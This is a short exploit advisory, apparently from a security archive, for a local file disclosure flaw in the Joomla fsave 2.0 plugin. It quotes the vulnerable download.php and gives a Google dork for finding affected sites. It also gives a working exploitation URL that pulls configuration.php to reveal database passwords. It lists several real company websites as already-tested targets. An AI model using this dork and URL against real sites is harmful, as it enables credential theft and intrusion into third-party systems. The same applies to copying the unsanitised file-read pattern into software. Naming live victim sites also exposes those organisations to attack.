Joomla Fsave 2.0 Local File Disclosure

2016.01.20
Credit: KnocKout
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A
Dork: inurl:plugins/content/fsave/

.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Joomla <= (fsave Plugin) Local File Disclosure Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Skype : knockoutr@msn.com [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com ) =================================================================== ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Joomla |~Plugin : fsave |~Affected Version : 2.0 |~Software : N/A |~RISK : High |~Google Dork : inurl:plugins/content/fsave/ =================================================================== ======================Info========================================= can be easily found in any database password for this "configuration.php" will be sufficient to read possible to read the file on the local database. incorrect coding and unconscious in it causing "download.php" file. that's laughter reason codes:) ============ Error line's in download.php =========================== <?php define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__))))); $file = JPATH_BASE."/".$_GET['filename']; header('Content-Description: File Transfer'); header("Content-type: application/octet-stream"); header("Content-disposition: attachment; filename=".basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Length: " . filesize($file)); ob_clean(); flush(); readfile($file); ?> ====================================================================== ======================== Tested on Demos ============================ http://www.gedore.pl http://www.gedore.com.pl http://www.rhodius.pl http://rhodius.com.pl http://loesomat.pl http://carolus.com.pl http://klann.pl ======================================================================= ========================= Exploitation ==================== http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php =======================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top